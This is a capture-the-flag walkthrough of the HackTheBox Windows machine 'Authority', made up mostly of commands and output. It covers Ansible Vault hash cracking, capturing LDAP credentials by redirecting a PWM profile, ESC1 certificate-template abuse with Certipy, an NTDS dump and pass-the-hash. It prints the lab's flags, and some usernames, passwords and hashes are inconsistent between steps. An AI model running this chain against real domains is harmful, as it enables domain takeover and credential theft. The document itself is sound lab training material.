HTB - Authority

Description

Authority is a medium-difficulty Windows machine that highlights the dangers of misconfigurations, password reuse, storing credentials on shares, and demonstrates how default settings in Active Directory (such as the ability for all domain users to add up to 10 computers to the domain) can be combined with other issues (vulnerable AD CS certificate templates) to take over a domain.

Enumeration

Nmap Scan

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
8443/tcp open  https-alt

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn 

PORT     STATE  SERVICE
53/udp   open   domain
88/udp   open   kerberos-sec
123/udp  open   ntp
389/udp  open   ldap

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nmap -p53,80,88,135,139,389,445,8443 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos                
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Active Directory LDAP (Domain: authority.htb)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2024-11-09T16:43:18+00:00; +4h00m00s from scanner time.
445/tcp  open  microsoft-ds?
636/tcp open   ldapssl
8443/tcp open  ssl/https-alt

..snip..
Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-time: 
|   date: 2024-11-09T16:43:10
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Summary

* Open ports: 53,80,88,135,139,389,445,8443
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - RPC - SMB - KERBEROS - LDAP
* Important notes: Domain: authority.htb

hosts file

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $sudo sh -c "echo  '$ip AUTHORITY authority.htb AUTHORITY.authority.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $tail -n1 /etc/hosts
10.10.11.222 AUTHORITY authority.htb AUTHORITY.authority.htb

After discovering open ports and updating /etc/hosts file, I will move to enumerate the services running one by one.

HTTP Enumeration

Visiting http://authority.htb/ shows me normal IIS webpage

When I tried to fuzz the website, I didn't get anything for both directories and files, So I will move to webapp at 8443 port

When I visit the site at http://authority.htb:8443/, It tells me it needs TLS, So I will try access it using https

When I visit the same URL but with https, I'm redirected to https://authority.htb:8443/pwm/private/login

This message states that the Webapp is in Configuration mode which allows updating the configuration without LDAP authentication

There are also two buttons here and both of them leading to the same page

I can see LDAP distinguished name here with username of svc_pwm and DC of htb.corp

When I tried to authenticate with *:* (for ldap injection testing), I get this error that reveals another username svc_ldap. Also, I get the same error using any other credentials

From here, I can't do many things, So I will move to other services (SMB, Kerberos, ..etc)

Kerberos Enumeration

Unluckily, this user can't be asrepoasted

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-GetNPUsers authority.htb/svc_ldap@10.10.11.222 -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for svc_ldap@10.10.11.222
[-] User svc_ldap@10.10.11.222 doesn't have UF_DONT_REQUIRE_PREAUTH set

SMB & RPC Enumeration

No data from RPC

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c enumdomgroups
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

Here I can see I have READ access on Development share

There are several files in this share but with no use and I can see ADCS folder, So It might be indicator to PKI existence

nxc smb authority -u 'guest' -p '' -M spider_plus
cat /tmp/nxc_hosted/nxc_spider_plus/10.10.11.222.json

..snip..
{
    "Development": {
        "Automation/Ansible/ADCS/.ansible-lint": {
            "atime_epoch": "2023-03-17 09:20:48",
            "ctime_epoch": "2023-03-17 09:20:48",
            "mtime_epoch": "2023-03-17 09:37:52",
            "size": "259 B"
        },
        "Automation/Ansible/ADCS/.yamllint": {
            "atime_epoch": "2023-03-17 09:20:48",
            "ctime_epoch": "2023-03-17 09:20:48",
            "mtime_epoch": "2023-03-17 09:37:52",
            "size": "205 B"
        },
        "Automation/Ansible/ADCS/LICENSE": {
            "atime_epoch": "2023-03-17 09:20:48",
            "ctime_epoch": "2023-03-17 09:20:48",
            "mtime_epoch": "2023-03-17 09:37:52",
            "size": "11.1 KB"
        },
        "Automation/Ansible/ADCS/README.md": {
            "atime_epoch": "2023-03-17 09:20:48",
            "ctime_epoch": "2023-03-17 09:20:48",
            "mtime_epoch": "2023-03-17 09:37:52",
            "size": "7.11 KB"
..snip..

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-smbclient authority.htb/guest@10.10.11.222
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:

$ shares
ADMIN$
C$
Department Shares
Development
IPC$
NETLOGON
SYSVOL

I found several files containing passwords not non of them worked

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat ansible_inventory

ansible_user: administrator
ansible_password: Welcome1
ansible_port: 5985
ansible_connection: winrm
ansible_winrm_transport: ntlm
ansible_winrm_server_cert_validation: ignore

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat tomcat-users.xml.j2

..snip..
<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>  
<user username="robot" password="T0mc@tR00t" roles="manager-script"/>
</tomcat-users>

Under PWN/defaults/, there is file containing ansible secrets

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ cat pwn/defaults/main.yml

..snip..
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |

$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764

I run the command and it asked for a password, So I supplied Welcome1 (found before) as a password but it gave me this error

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible-vault decrypt main.yml
Vault password: 
ERROR! input is not vault encrypted data. /home/kali/HackTheBox/platform/machines/Authority/main.yml is not a vault encrypted file for /home/kali/HackTheBox/platform/machines/Authority/main.yml

I released I made something wrong which is I should get the hashes of these secrets and crack them to get the correct password

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat main.yml

$ANSIBLE_VAULT;1.1;AES256
326665343864353665376531366637316331386162643232303835663339663466623131613262396134353663663462373265633832356663356239383039640a346431373431666433343434366139356536343763336662346134663965343430306561653964643235643733346162626134393430336334326263326364380a6530343137333266393234336261303438346635383264396362323065313438

$ANSIBLE_VAULT;1.1;AES256
313563383439633230633734353632613235633932356333653561346162616664333932633737363335616263326464633832376261306131303337653964350a363663623132353136346631396662386564323238303933393362313736373035356136366465616536373866346138623166383535303930356637306461350a3164666630373030376537613235653433386539346465336633653630356531

$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible2john secret1 > secret1.hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible2john secret2 > secret2.hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible2john secret3 > secret3.hash

Modify the output hashes to match this format:

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat ansible.hashes

$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8
$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5
$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73ad5d8804b4b2511c3b15814ebcf2fe98334284203635

Foothold

Crack with hashcat using auto-detect hash mode gives me the same password for all the three hashes

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ hashcat hashes.txt /usr/share/wordlists/rockyou.txt 

$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed228809393b1767055a66deae678f4a8b1f8550905f70da5:!@#$%^&*

$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647cc3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8:!@#$%^&*

$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73aad5d8804b4b2511c3b15814ebcf2fe98334284203635:!@#$%^&*

Session..........: hashcat
Status...........: Cracked

I followed this post to decrypt the secrets:

Ansible Vault: Encrypt | Decrypt a String - ShellHacksShellHacks

first I need to install ansbile package to use ansible-vault command

sudo apt install ansible

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $echo '$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764' | ansible-vault decrypt --vault-password-file=vault.txt

Decryption successful
DevT3st@123

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $echo '$ANSIBLE_VAULT;1.1;AES256
326665343864353665376531366637316331386162643232303835663339663466623131613262396134353663663462373265633832356663356239383039640a346431373431666433343434366139356536343763336662346134663965343430306561653964643235643733346162626134393430336334326263326364380a6530343137333266393234336261303438346635383264396362323065313438' | ansible-vault decrypt --vault-password-file=vault.txt

Decryption successful
svc_pwm

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $echo '$ANSIBLE_VAULT;1.1;AES256
313563383439633230633734353632613235633932356333653561346162616664333932633737363335616263326464633832376261306131303337653964350a363663623132353136346631396662386564323238303933393362313736373035356136366465616536373866346138623166383535303930356637306461350a3164666630373030376537613235653433386539346465336633653630356531' | ansible-vault decrypt --vault-password-file=vault.txt

Decryption successful
pWm_@dm!N_!23

I tried several combination of usernames and passwords. This one only worked

I checked for lab access and get access denied

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nxc smb authority -u svc_pwn -p 'pWm_@dm!N_!23' --shares

SMB         10.10.11.222    445    AUTHORITY        [+] authority.htb\svc_pwn:pWm_@dm!N_!23 
SMB         10.10.11.222    445    AUTHORITY        [-] Error enumerating shares: STATUS_ACCESS_DENIED

Lateral Movement

I released that it's dead end because svc_pwn can't authenticate to ldap, either. I will try the credential to the webapp on 8443 port.

The password worked on Configuraiton Manager tab only not the main login-form

Under Confgiuration Editor, there is Connection tab that has several field and I can see that svc_ldap user's credentials is stored on the server and connect to ldaps://authority.authority.htb:636, So If I change this value to my host's IP, I can get the credentials.

And then click on Test LDAP Profile

svc_ldap:htblDaP_1n_th3_cle4r!

Now I have valid domain account, access to winRM and know that ADCS exists.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $evil-winrm -i authority -u svc_ldap -p 'lDaP_1n_th3_cle4r!' 

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> type user.txt
394683251efed7605f3dfa7c20d37ad1

User Flag: 394683251efed7605f3dfa7c20d37ad1

Privilege Escalation

Since ADCS exists, I will check for vulnerable templates with Certipy

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy find -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -vulnerable -stdout

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA

..snip..
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA

..snip..

    [!] Vulnerabilities
      ESC1                              : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

Domain Computers can abuse ESC1 to get domain admins privileges by specifing "subject alternative name" to privileged user in the domain (Administrator) and I can create one if the machine account qoute is not set to Zero.

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nxc ldap authority -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -M maq

LDAPS       10.10.11.222    636    AUTHORITY        [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r! 
MAQ         10.10.11.222    389    AUTHORITY        [*] Getting the MachineAccountQuota
MAQ         10.10.11.222    389    AUTHORITY        MachineAccountQuota: 10

The value is 10, So I can add new Computer account

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-addcomputer authority.htb/svc_ldap@authority.authority.htb -computer-name 'blind0bandit$' -computer-pass 'blind0bandit@@!!!@@' -dc-host authority.authority.htb -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] CCache file is not found. Skipping...
[*] Successfully added machine account blind0bandit$ with password blind0bandit@@!!!@@.

Request Certificate as Administrator

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy req -u 'blind0bandit$@authority.htb' -p 'blind0bandit@@!!!@@' -ca AUTHORITY-CA -template CorpVPN -upn administrator@authority.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.222   
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

I get KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type) that means PKINIT authentication is not implemented, but fortunately Certipy has -ldap-shell option

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.222 -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Connecting to 'ldaps://10.10.11.222:636'
[*] Authenticated to '10.10.11.222' as: u:HTB\Administrator
Type help for list of commands

# change_password 'authority$'
Got User DN: CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
Attempting to set new password of: X!xJ#)>|HFPi";;
Password changed successfully!

I changed the password of the dc machine account to instead of administrator to minimize the damage

Dump ntds secrets to get administrator hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nxc smb 10.10.11.222 -u 'authority$' -p 'X!xJ#)>|HFPi";;' --ntds --user administrator

SMB    10.10.11.222    445    AUTHORITY        Administrator:500:aad3b435b51404eeaad3b435b51404ee:6961f422924da90a6928xxxxxxxxxxx:::

Access the machine now :))

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $evil-winrm -i authority -u administrator -H 6961f422924da90a6928xxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
1c920b7d7e0303262573017ecc5e09d0

Root Flag: 1c920b7d7e0303262573017ecc5e09d0

PreviousMedium NextHTB - Escape

Last updated 1 year ago